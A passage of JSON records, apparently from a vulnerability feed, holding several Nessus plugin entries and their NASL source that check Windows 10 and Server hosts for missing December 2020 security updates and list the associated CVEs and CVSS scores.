"vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4592440: Windows 10 Version 1809 and Windows Server 2019 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-16996", "CVE-2020-17092", "CVE-2020-17094", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17099", "CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136", "CVE-2020-17139", "CVE-2020-17140"], "modified": "2022-05-11T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4586793.NASL", "href": "https://www.tenable.com/plugins/nessus/143561", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143561);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/11\");\n\n script_cve_id(\n \"CVE-2020-16958\",\n \"CVE-2020-16959\",\n \"CVE-2020-16960\",\n \"CVE-2020-16961\",\n \"CVE-2020-16962\",\n \"CVE-2020-16963\",\n \"CVE-2020-16964\",\n \"CVE-2020-16996\",\n \"CVE-2020-17092\",\n \"CVE-2020-17094\",\n \"CVE-2020-17095\",\n \"CVE-2020-17096\",\n \"CVE-2020-17097\",\n \"CVE-2020-17098\",\n \"CVE-2020-17099\",\n \"CVE-2020-17103\",\n \"CVE-2020-17134\",\n \"CVE-2020-17136\",\n \"CVE-2020-17139\",\n \"CVE-2020-17140\"\n );\n script_xref(name:\"MSKB\", value:\"4592440\");\n script_xref(name:\"MSFT\", value:\"MS20-4592440\");\n script_xref(name:\"IAVA\", value:\"2020-A-0561-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4592440: Windows 10 Version 1809 and Windows Server 2019 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4592440. \nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960,\n CVE-2020-16961, CVE-2020-16962, CVE-2020-16963,\n CVE-2020-16964, CVE-2020-17092, CVE-2020-17097,\n CVE-2020-17103, CVE-2020-17134, CVE-2020-17136)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2020-17095,\n CVE-2020-17096)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17094, CVE-2020-17098,\n CVE-2020-17140)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2020-16996, CVE-2020-17099, CVE-2020-17139)\");\n # https://support.microsoft.com/en-us/help/4592440/windows-10-update-kb4592440\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1972925b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4592440.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17096\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-17095\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4592440');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592440])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T15:13:53", "description": "The remote Windows host is missing security update 4592446.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2020-17099)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2020-17095, CVE-2020-17096)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964, CVE-2020-17092, CVE-2020-17097, CVE-2020-17103, CVE-2020-17134, CVE-2020-17136)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2020-17094, CVE-2020-17098, CVE-2020-17140)", "cvss3": {"score": 9.9, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4592446: Windows 10 Version 1803 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-17092", "CVE-2020-17094", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17099", "CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136", "CVE-2020-17140"], "modified": "2022-05-11T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4592446.NASL", "href": "https://www.tenable.com/plugins/nessus/143571", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143571);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/11\");\n\n script_cve_id(\n \"CVE-2020-16958\",\n \"CVE-2020-16959\",\n \"CVE-2020-16960\",\n \"CVE-2020-16961\",\n \"CVE-2020-16962\",\n \"CVE-2020-16963\",\n \"CVE-2020-16964\",\n \"CVE-2020-17092\",\n \"CVE-2020-17094\",\n \"CVE-2020-17095\",\n \"CVE-2020-17096\",\n \"CVE-2020-17097\",\n \"CVE-2020-17098\",\n \"CVE-2020-17099\",\n \"CVE-2020-17103\",\n \"CVE-2020-17134\",\n \"CVE-2020-17136\",\n \"CVE-2020-17140\"\n );\n script_xref(name:\"MSKB\", value:\"4592446\");\n script_xref(name:\"MSFT\", value:\"MS20-4592446\");\n script_xref(name:\"IAVA\", value:\"2020-A-0561-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4592446: Windows 10 Version 1803 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4592446.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2020-17099)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2020-17095,\n CVE-2020-17096)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960,\n CVE-2020-16961, CVE-2020-16962, CVE-2020-16963,\n CVE-2020-16964, CVE-2020-17092, CVE-2020-17097,\n CVE-2020-17103, CVE-2020-17134, CVE-2020-17136)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17094, CVE-2020-17098,\n CVE-2020-17140)\");\n # https://support.microsoft.com/en-us/help/4592446/windows-10-update-kb4592446\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e51f32b6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4592446.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17096\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-17095\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4592446');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592446])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T15:42:36", "description": "The remote Windows host is missing security update 4593226.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964, CVE-2020-17092, CVE-2020-17097)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2020-17095, CVE-2020-17096)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2020-16996, CVE-2020-17099)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2020-17098, CVE-2020-17138, CVE-2020-17140)", "cvss3": {"score": 8.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4593226: Windows 10 Version 1607 and Windows Server 2016 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-16996", "CVE-2020-17092", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17099", "CVE-2020-17138", "CVE-2020-17140"], "modified": "2021-06-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4586830.NASL", "href": "https://www.tenable.com/plugins/nessus/143569", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143569);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-16958\",\n \"CVE-2020-16959\",\n \"CVE-2020-16960\",\n \"CVE-2020-16961\",\n \"CVE-2020-16962\",\n \"CVE-2020-16963\",\n \"CVE-2020-16964\",\n \"CVE-2020-16996\",\n \"CVE-2020-17092\",\n \"CVE-2020-17095\",\n \"CVE-2020-17096\",\n \"CVE-2020-17097\",\n \"CVE-2020-17098\",\n \"CVE-2020-17099\",\n \"CVE-2020-17138\",\n \"CVE-2020-17140\"\n );\n script_xref(name:\"MSKB\", value:\"4593226\");\n script_xref(name:\"MSFT\", value:\"MS20-4593226\");\n script_xref(name:\"IAVA\", value:\"2020-A-0561-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4593226: Windows 10 Version 1607 and Windows Server 2016 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4593226.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960,\n CVE-2020-16961, CVE-2020-16962, CVE-2020-16963,\n CVE-2020-16964, CVE-2020-17092, CVE-2020-17097)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2020-17095,\n CVE-2020-17096)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2020-16996, CVE-2020-17099)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17098, CVE-2020-17138,\n CVE-2020-17140)\");\n # https://support.microsoft.com/en-us/help/4593226/windows-10-update-kb4593226\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?779e1d95\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4586830.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"manual\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"Score based on analysis of the vendor advisory.\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4593226');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4593226])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T15:14:29", "description": "The remote Windows host is missing security update 4592449.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964, CVE-2020-17092, CVE-2020-17097, CVE-2020-17103, CVE-2020-17134, CVE-2020-17136)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2020-17095, CVE-2020-17096)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2020-17139)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2020-17094, CVE-2020-17098, CVE-2020-17140)", "cvss3": {"score": 9.9, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4592449: Windows 10 Version 1903 and Windows 10 Version 1909 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-16996", "CVE-2020-17092", "CVE-2020-17094", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17103", "CVE-2020-17131", "CVE-2020-17134", "CVE-2020-17136", "CVE-2020-17139", "CVE-2020-17140"], "modified": "2022-05-11T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4592449.NASL", "href": "https://www.tenable.com/plugins/nessus/143570", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143570);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/11\");\n\n script_cve_id(\n \"CVE-2020-16958\",\n \"CVE-2020-16959\",\n \"CVE-2020-16960\",\n \"CVE-2020-16961\",\n \"CVE-2020-16962\",\n \"CVE-2020-16963\",\n \"CVE-2020-16964\",\n \"CVE-2020-16996\",\n \"CVE-2020-17092\",\n \"CVE-2020-17094\",\n \"CVE-2020-17095\",\n \"CVE-2020-17096\",\n \"CVE-2020-17097\",\n \"CVE-2020-17098\",\n \"CVE-2020-17103\",\n \"CVE-2020-17131\",\n \"CVE-2020-17134\",\n \"CVE-2020-17136\",\n \"CVE-2020-17139\",\n \"CVE-2020-17140\"\n );\n script_xref(name:\"MSKB\", value:\"4592449\");\n script_xref(name:\"MSFT\", value:\"MS20-4592449\");\n script_xref(name:\"IAVA\", value:\"2020-A-0555\");\n script_xref(name:\"IAVA\", value:\"2020-A-0561-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4592449: Windows 10 Version 1903 and Windows 10 Version 1909 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4592449.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960,\n CVE-2020-16961, CVE-2020-16962, CVE-2020-16963,\n CVE-2020-16964, CVE-2020-17092, CVE-2020-17097,\n CVE-2020-17103, CVE-2020-17134, CVE-2020-17136)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2020-17095,\n CVE-2020-17096)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2020-17139)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17094, CVE-2020-17098,\n CVE-2020-17140)\");\n # https://support.microsoft.com/en-us/help/4592449/windows-10-update-kb4592449\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c49efc98\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4592449.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17096\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-17095\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4592449');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18362',\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592449])\n|| \n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592449])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-01T16:32:54", "description": "The remote Windows host is missing security update 4592464.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2020-17099)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2020-17098, CVE-2020-17140)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964, CVE-2020-17092, CVE-2020-17097)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2020-17096)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4592464: Windows 10 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": 